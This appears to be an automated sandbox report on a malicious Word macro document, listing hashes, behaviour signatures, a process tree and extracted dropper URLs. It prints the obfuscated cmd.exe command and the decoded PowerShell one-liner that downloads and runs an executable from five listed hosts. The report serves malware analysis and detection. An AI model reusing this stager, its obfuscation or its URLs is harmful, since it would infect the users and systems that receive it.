Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/05/2024, 21:08

General

  • Target

    7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc

  • Size

    66KB

  • MD5

    7e6980371f32c621d20998ef8e211bac

  • SHA1

    593532859a14a3cd2f46eba73f5398641544d551

  • SHA256

    6ccd4c745fb1d6d9e1629b3eb80fc7e8286c902e3629f59a3677d3b9375497e0

  • SHA512

    5a328991d18a379fc5606b757cd7c9c3da2500bc4ae7ac0d33401b1bb0d51ecbff2cb02adf5b4239807a1460b58dee4127e79383cd93724d708da797e60b1364

  • SSDEEP

    768:BpJcaUitGAlmrJpmxlzC+w99NBs+1owTRj5EnAYspPZiFfqPd:BptJlmrJpmxlRw99NBs+awly9spPZO

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://laschuk.com.br/C7f65h8p

exe.dropper

http://jobarba.com/wp-content/nY7NWG7z

exe.dropper

http://familiekoning.net/YT9gzKUs

exe.dropper

http://www.ultigamer.com/wp-admin/includes/OCklr3Q

exe.dropper

http://fluorescent.cc/ttQoKkJ4sC

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3060
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V^:/C"^se^t ^3^s^H= ^ ^ ^ ^ ^ }^}{hctac}^;^kaerb^;q^jV$ ^metI-e^kovn^I^;)^qjV^$ ^,r^YC^$(^eli^Fdaoln^w^o^D.Vn^F^$^{yrt{)^T^wi$^ n^i^ rYC^$(^hc^a^erof^;'^e^xe.^'+^B^d^Y^$+'^\^'+c^ilbu^p^:vn^e$^=^qjV$^;^'8^4^3'^ =^ B^dY$;)'^@'(^t^i^lpS^.'Cs^4Jk^K^oQt^t/cc.^tn^ec^seroulf//^:^p^tt^h^@Q3rl^kCO/^sedulcn^i/n^i^md^a-^pw/^m^oc.re^mag^i^t^l^u^.^w^ww//^:^p^tt^h@^s^UKz^g^9^TY/^ten.gnino^ke^i^li^m^a^f//:^p^tt^h^@z^7^G^WN7^Yn/^tn^etnoc^-pw/^m^oc^.a^br^a^b^o^j//^:ptth^@^p8h5^6f^7C/rb^.m^oc.k^u^hcsal//:^p^tth'^=T^wi$^;tneilC^be^W^.^teN ^tcejb^o-wen^=VnF$ ^ll^e^h^sr^ewo^p&&f^or /^L %^g ^in (^3^9^7^;^-1;^0)^d^o s^et ^K^3^X^e=!^K^3^X^e!!^3^s^H:~%^g,1!&&^if %^g ^l^e^q ^0 c^a^l^l %^K^3^X^e:~^-3^9^8%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $FnV=new-object Net.WebClient;$iwT='http://laschuk.com.br/C7f65h8p@http://jobarba.com/wp-content/nY7NWG7z@http://familiekoning.net/YT9gzKUs@http://www.ultigamer.com/wp-admin/includes/OCklr3Q@http://fluorescent.cc/ttQoKkJ4sC'.Split('@');$YdB = '348';$Vjq=$env:public+'\'+$YdB+'.exe';foreach($CYr in $iwT){try{$FnV.DownloadFile($CYr, $Vjq);Invoke-Item $Vjq;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1548

Network

MITRE ATT&CK Enterprise v15


Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      9caa68ecc11a6575ee46ca75d298a31d

      SHA1

      8cd35c4ba8cc56c08ed91826bc1ac26377b97407

      SHA256

      f429f32edbe7435ec2d4d96977bb994caa15b3c8374856e76c34056a6c002b2c

      SHA512

      ca283cab68386cebf77b6be79f0323f878d0b9512145a8ca354f83e97d78d43bcfb19a0d018014322181c3282922b8113bcb5108d7c12652139b0f729d60f69e

    • memory/1632-13-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-9-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-7-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-15-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-17-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-0-0x000000002FE11000-0x000000002FE12000-memory.dmp

      Filesize

      4KB

    • memory/1632-10-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-2-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB

    • memory/1632-6-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-29-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB

    • memory/1632-30-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1632-45-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1632-46-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB